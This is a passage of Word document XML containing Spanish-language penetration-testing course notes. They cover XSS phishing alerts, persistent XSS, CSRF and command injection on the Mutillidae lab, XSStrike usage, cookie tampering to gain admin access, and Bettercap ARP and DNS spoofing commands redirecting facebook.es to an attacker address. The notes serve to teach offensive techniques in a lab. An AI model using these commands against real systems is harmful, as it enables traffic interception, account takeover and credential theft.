          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1243D813" wp14:editId="4FC4FC5C">
            <wp:extent cx="4968671" cy="2149026"/>
            <wp:effectExtent l="0" t="0" r="3810" b="381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68671" cy="2149026"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB157BB" w14:textId="5DCD8C17" w:rsidR="009A1BA3" w:rsidRPr="009A1BA3" w:rsidRDefault="00C57A0A" w:rsidP="009A1BA3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lo normal es que si podemos usar html, también podamos usar &lt;script&gt; para ejecutar código de javascript. Aunque NORMALMENTE SE DESESTIMA, es recomendable tener una serie de payload donde se pueda explotar de forma muy visual para añadir al reporte.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A650587" w14:textId="37CE6B3D" w:rsidR="00C57A0A" w:rsidRPr="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="00C57A0A">
      <w:r w:rsidRPr="00C57A0A">
        <w:t>Podríamos sacar alertas para hacer algo de phishing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F4C4F3" w14:textId="4E432150" w:rsidR="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="009A1BA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3402BD" wp14:editId="6C59DB68">
            <wp:extent cx="4656223" cy="2530059"/>
            <wp:effectExtent l="0" t="0" r="0" b="38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56223" cy="2530059"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0061CFB6" w14:textId="438E347C" w:rsidR="00C57A0A" w:rsidRPr="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="00C57A0A">
      <w:r w:rsidRPr="00C57A0A">
        <w:t>Con el que el usuario recibiría el siguiente mensaje falso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41806252" w14:textId="6955D856" w:rsidR="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="009A1BA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D593ADA" wp14:editId="03338E59">
            <wp:extent cx="4442845" cy="2972058"/>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42845" cy="2972058"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0954F375" w14:textId="77777777" w:rsidR="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="009A1BA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54468527" w14:textId="262004E1" w:rsidR="005D743D" w:rsidRPr="00C57A0A" w:rsidRDefault="00C57A0A" w:rsidP="00C57A0A">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57A0A">
        <w:rPr>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Para evitar problemas con saltos de línea podemos enviar los datos a través de Burpsuite codificándolos en formato de URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3567FAA4" w14:textId="287CB8F3" w:rsidR="00C57A0A" w:rsidRDefault="00AA2A0E" w:rsidP="00C57A0A">
      <w:r w:rsidRPr="00AA2A0E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Persistent Scripting:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Se trata de insertar script con HTML pero en un lugar persistente, como una entrada de blog o quizás un comentario. De tal forma que cada vez que esa entrada o ese comentario vaya a ser leído por el cliente, saltará nuestro script (por ejemplo, un pop-up de phishing). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D01AC4" w14:textId="5EDF4A9F" w:rsidR="00AA2A0E" w:rsidRDefault="00AA2A0E" w:rsidP="00C57A0A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Es bastante peligroso, pues dejamos reflejado la dirección de la máquina atacante por ejemplo si tenemos un script que capture y envíe información a nuestro servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373EACAC" w14:textId="3EA78BE3" w:rsidR="00AA2A0E" w:rsidRDefault="00AA2A0E" w:rsidP="00C57A0A">
      <w:r w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cross Site Request For</w:t>
      </w:r>
      <w:r w:rsidR="00967AE9" w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>waring</w:t>
      </w:r>
      <w:r w:rsidR="00967AE9" w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (CSRF)</w:t>
      </w:r>
      <w:r w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00967AE9" w:rsidRPr="00967AE9">
        <w:t>Consiste en hacer que un usuario legítimo realice acciones sobre la aplicación web sin que él mismo sepa que lo está haciendo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE55F7" w14:textId="4253A182" w:rsidR="00967AE9" w:rsidRDefault="00967AE9" w:rsidP="00C57A0A">
      <w:r>
        <w:t>Por ejemplo, codificamos algún payload en URL con Burpsuite y lo mandamos a una entrada de blog:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D67D537" w14:textId="72AEC06C" w:rsidR="00967AE9" w:rsidRDefault="00967AE9" w:rsidP="00C57A0A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00967AE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F073CD4" wp14:editId="32B8B2C3">
            <wp:extent cx="5400040" cy="315150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151505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3518EA6B" w14:textId="7B81F322" w:rsidR="00967AE9" w:rsidRDefault="00967AE9" w:rsidP="00967AE9">
      <w:r w:rsidRPr="00967AE9">
        <w:t>Como vemos en Mutillidae, crea una entrada de blog vacía que es la que almacena el payload de manera invisible.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Y cada vez que se cargue la página, va a estar añadiendo una entrada de blog, evidentemente la alerta está en este payload de manera informativa. Pero existen payloads de muchos tipos como creación de usuarios</w:t>
      </w:r>
      <w:r w:rsidR="008961A3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475F9F9E" w14:textId="4369B19B" w:rsidR="00967AE9" w:rsidRDefault="00967AE9" w:rsidP="00967AE9">
      <w:r w:rsidRPr="00967AE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F32612E" wp14:editId="75D38AC5">
            <wp:extent cx="5400040" cy="174244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1742440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF6D5C" w14:textId="58A34B65" w:rsidR="000252F2" w:rsidRDefault="000252F2" w:rsidP="00967AE9"/>
    <w:p w14:paraId="6FF5AAC2" w14:textId="6486BBF6" w:rsidR="000252F2" w:rsidRDefault="000252F2" w:rsidP="000252F2">
      <w:pPr>
        <w:ind w:left="360"/>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XSStrike</w:t>
      </w:r>
      <w:r w:rsidRPr="004A2B6E">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1FE5C4EE" w14:textId="55891674" w:rsidR="000252F2" w:rsidRDefault="000252F2" w:rsidP="000252F2">
      <w:r>
        <w:t>Herramienta para automatizar el Cross-Site-Scripting. Para instalarlo, al ser una herramienta en Python, hay que instalar primero pip3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F3171" w14:textId="4F76B98D" w:rsidR="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo apt-get install python3-pip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B92B1E" w14:textId="62298F1C" w:rsidR="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">git clone </w:t>
      </w:r>
      <w:hyperlink r:id="rId73" w:history="1">
        <w:r w:rsidRPr="005D571C">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://github.com/s0md3v/XSStrike.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09EC469F" w14:textId="78A16F82" w:rsidR="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:r w:rsidRPr="00223664">
        <w:t>La ruta puede variar, si no funciona, acceder al repositorio de github</w:t>
      </w:r>
      <w:r>
        <w:t>. Nos dirigimos a donde lo hayamos descargado, en este caso a la carpeta home, en XSStrike:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643FD984" w14:textId="5182F6D1" w:rsidR="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00223664">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28439A7A" w14:textId="3BA7C79E" w:rsidR="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:r>
        <w:t>Ahora la herramienta está instalada, para ejecutarla hay que hacerlo con Python3 y señalar el script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA1C31A" w14:textId="34023D5F" w:rsidR="00223664" w:rsidRDefault="003003D5" w:rsidP="00223664">
      <w:r>
        <w:t>Ahora para usarla:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9444C" w14:textId="7F85BFC7" w:rsidR="003003D5" w:rsidRPr="00BC47CD" w:rsidRDefault="003003D5" w:rsidP="00223664">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC47CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo python3 xsstrike.py -u "http://192.168.52.134/mutillidae/index.php?page=user-info.php" --timeout 5</w:t>
      </w:r>
      <w:r w:rsidR="004E40ED" w:rsidRPr="00BC47CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0B3DED" w14:textId="2D17A565" w:rsidR="003003D5" w:rsidRPr="00223664" w:rsidRDefault="003003D5" w:rsidP="00223664">
      <w:r>
        <w:t xml:space="preserve">Con -u indicamos la </w:t>
      </w:r>
      <w:r w:rsidR="004E40ED">
        <w:t>URL a analizar. La herramienta genera los payloads automáticamente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4352F05B" w14:textId="77777777" w:rsidR="00223664" w:rsidRPr="00223664" w:rsidRDefault="00223664" w:rsidP="00223664">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3177E626" w14:textId="0225C09D" w:rsidR="00BC47CD" w:rsidRDefault="00BC47CD" w:rsidP="000252F2">
      <w:r w:rsidRPr="00BC47CD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Command Injection:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC47CD">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Consiste en simplemente aprovecharnos de algún formulario donde directamente se le haga pasar una variable que se ejecute en el sistema de la aplicación web. Por ejemplo, en un NSLookup, poner:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B0140" w14:textId="049B7DA9" w:rsidR="00BC47CD" w:rsidRDefault="00BC47CD" w:rsidP="00BC47CD">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00BC47CD">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D5B07B9" wp14:editId="1785D726">
            <wp:extent cx="5400040" cy="295656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956560"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C30805A" w14:textId="1FFCC976" w:rsidR="00BC47CD" w:rsidRDefault="00BC47CD" w:rsidP="00BC47CD">
      <w:r>
        <w:t>Como vemos, al separar por “;” los comandos, la aplicación web nos va a devolver los dos resultados de los dos comandos, listando los directorios de /var/www/html/mutillidae (ls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC96AF1" w14:textId="536F6806" w:rsidR="00BC47CD" w:rsidRDefault="00BC47CD" w:rsidP="00BC47CD">
      <w:r>
        <w:t>Es muy poco probable encontrar algo así, pues está muy controlado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F68505" w14:textId="2105E556" w:rsidR="00BC47CD" w:rsidRDefault="00627555" w:rsidP="00BC47CD">
      <w:r w:rsidRPr="00627555">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cookie Tampering:</w:t>
      </w:r>
      <w:r w:rsidRPr="00627555">
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Consiste en modificar las cookies para hacerte pasar por otro usuario y obtener permisos. Por ejemplo, cuando cambiamos los valores de uid=1 podríamos llegar a hacernos pasar por el administrador.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3BC804" w14:textId="666AAFC2" w:rsidR="00627555" w:rsidRDefault="00627555" w:rsidP="00627555">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00627555">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0902D47A" wp14:editId="4C9E0D22">
            <wp:extent cx="4892464" cy="1836579"/>
            <wp:effectExtent l="0" t="0" r="381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92464" cy="1836579"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F8CF26" w14:textId="743FF5A5" w:rsidR="00627555" w:rsidRDefault="00627555" w:rsidP="00627555">
      <w:r>
        <w:t>Al interceptar un paquete, estando loggeado como “nerea”, notamos que tiene un uid=25. Si registramos otro usuario notaremos que su uid será igual a 26, por lo que podemos simplemente variar ese dato para obtener los permisos de otro usuario, por ejemplo, el administrador, que normalmente es el primer usuario(uid=1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BFA989" w14:textId="1F6FD9E5" w:rsidR="00627555" w:rsidRDefault="00627555" w:rsidP="00627555">
      <w:r w:rsidRPr="00627555">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2106E176" wp14:editId="1CB74EAE">
            <wp:extent cx="5400040" cy="2625725"/>
            <wp:effectExtent l="0" t="0" r="0" b="317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625725"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BE98E7" w14:textId="2A10CDAC" w:rsidR="00BC47CD" w:rsidRDefault="00627555" w:rsidP="00BC47CD">
      <w:r>
        <w:t>Automáticamente, al cambiar el uid a 1, notamos como nos hemos quedado loggeados como admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEFF65" w14:textId="1188C393" w:rsidR="00A459E7" w:rsidRDefault="00A459E7" w:rsidP="00BC47CD"/>
    <w:p w14:paraId="58A62C10" w14:textId="00058409" w:rsidR="00A459E7" w:rsidRPr="001E1F57" w:rsidRDefault="00A459E7" w:rsidP="00A459E7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00607075">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Explotación y Hacking de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t xml:space="preserve">Vulnerabilidades </w:t>
      </w:r>
      <w:r w:rsidR="0048361A">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>en Red</w:t>
      </w:r>
      <w:r w:rsidRPr="00607075">
        <w:rPr>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C368F7" w14:textId="1A5C0B61" w:rsidR="00BD5A9A" w:rsidRDefault="00BD5A9A" w:rsidP="00BD5A9A">
      <w:pPr>
        <w:ind w:left="720"/>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Bettercap</w:t>
      </w:r>
      <w:r w:rsidRPr="00BD5A9A">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582D4C59" w14:textId="1AC1EEA9" w:rsidR="00BD5A9A" w:rsidRPr="00BD5A9A" w:rsidRDefault="005C304C" w:rsidP="00BD5A9A">
      <w:r>
        <w:t xml:space="preserve">Para iniciar Bettercap, </w:t>
      </w:r>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo bettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C397DF" w14:textId="3877260B" w:rsidR="00A459E7" w:rsidRDefault="005C304C" w:rsidP="00BC47CD">
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>ARP Spoofing:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Consiste en modificar la tabla ARP del cliente para que crea que nuestra dirección MAC tiene la ip del router. Para ello, escogemos la víctima y atacamos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099EEFDB" w14:textId="12D6D4C8" w:rsidR="005C304C" w:rsidRPr="005C304C" w:rsidRDefault="005C304C" w:rsidP="00BC47CD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set arp.spoof.targets 192.168.52.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56ADABC9" w14:textId="0E062954" w:rsidR="005C304C" w:rsidRDefault="005C304C" w:rsidP="00BC47CD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arp.spoof on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6C3570" w14:textId="7060CBE9" w:rsidR="005C304C" w:rsidRDefault="005C304C" w:rsidP="005C304C">
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42AD918B" wp14:editId="34B3CA33">
            <wp:extent cx="5400040" cy="1252855"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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252855"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B8B20" w14:textId="66150DBE" w:rsidR="005C304C" w:rsidRDefault="005C304C" w:rsidP="005C304C">
      <w:r>
        <w:t>Si abriéramos un Wireshark, notaremos que Bettercap está reenviando todos los paquetes al router. Es una técnica de Man in the Middle, es decir, podemos escuchar todo lo que haga ese host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C09CF7" w14:textId="619374BD" w:rsidR="00497ECD" w:rsidRDefault="00BC7296" w:rsidP="00BC7296">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> Spoofing</w:t>
      </w:r>
      <w:r w:rsidR="00446154">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> (SOLO HTTP)</w:t>
      </w:r>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00497ECD" w:rsidRPr="00497ECD">
        <w:t>Consiste en interceptar el DNS de la red para que los equipos sean redireccionados a el servidor que nosotros queramos, quizás una copia falsa de un sitio como Facebook para conseguir credenciales.</w:t>
      </w:r>
      <w:r w:rsidR="00497ECD">
        <w:t xml:space="preserve"> Para interceptar, primero ponemos el arp spoofing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E7D7247" w14:textId="77777777" w:rsidR="00497ECD" w:rsidRPr="005C304C" w:rsidRDefault="00497ECD" w:rsidP="00497ECD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set arp.spoof.targets 192.168.52.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EEE1F2" w14:textId="77777777" w:rsidR="00497ECD" w:rsidRDefault="00497ECD" w:rsidP="00497ECD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C304C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>arp.spoof on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE925B2" w14:textId="029B9ED7" w:rsidR="00497ECD" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:r>
        <w:t>A continuación, procedemos a indicar qué dominio queremos redireccionar, por ejemplo facebook.es:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27294FB6" w14:textId="46C1B06C" w:rsidR="0073431C" w:rsidRPr="0073431C" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073431C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set dns.spoof.domains facebook.es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F99F76E" w14:textId="2FE04483" w:rsidR="0073431C" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:r>
        <w:t>y a dónde lo queremos llevar y lo encendemos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C536653" w14:textId="49B1174D" w:rsidR="0073431C" w:rsidRPr="0073431C" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073431C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>set dns.spoof.address 192.168.52.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D7CA47" w14:textId="50B65840" w:rsidR="0073431C" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073431C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dns.spoof on</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E648230" w14:textId="26AE8411" w:rsidR="0073431C" w:rsidRDefault="0073431C" w:rsidP="00BC7296">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0073431C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A8D4D3F" wp14:editId="34E09485">
            <wp:extent cx="5400040" cy="200025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000250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="100D3A2C" w14:textId="4659C468" w:rsidR="0073431C" w:rsidRDefault="0094192F" w:rsidP="007C06B7">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
